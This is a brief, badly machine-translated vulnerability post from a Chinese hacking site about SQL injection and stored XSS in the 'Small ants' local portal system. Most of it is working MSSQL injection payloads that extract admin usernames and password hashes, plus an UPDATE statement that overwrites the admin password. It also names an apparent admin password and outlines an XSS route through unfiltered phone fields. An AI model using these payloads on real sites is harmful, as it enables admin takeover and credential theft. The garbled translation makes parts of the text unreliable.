Small ants local portal system sql injection and XSS-vulnerability warning-the black bar safety net

ID MYHACK58:62201341551
Type myhack58
Reporter 佚名
Modified 2013-12-24T00:00:00


  1. SQL injection: the'and%20db_name()%3E0--

demo_xiaomayi_co'and (select top 1 name from demo_xiaomayi_co. dbo. sysobjects where xtype=CHAR(8 5))>0--'and (select top 1 username from Ant_admin)>0-- the account'and (select top 1 password from Ant_admin)>0-- the password hash

Replace the password

paLhASC5WX1ZUvaBeDN+lQ==,for a good post,admin admin password is weiwei0307

This broken bird, found to be false`really need you to find your own way..

update Ant_admin set password='ViBrW10pU1RVIldbWlhUVFYiKV9dWFRRjsrcwlerucqmucxewvlquydzk19fxsnr' where Username='username'--

  1. xss

xsscan be comfortably background

Home frontXSSin publishing the yellow pages of the telephone book first to sign up for a membership, of course, these portal sites are open registration, the registration is good to publish the yellow pages of the Phone Book of the place.


Side of the phone and the phone back are not filtered, but the front Desk has a length limit, capture modifications click on OK, and then submit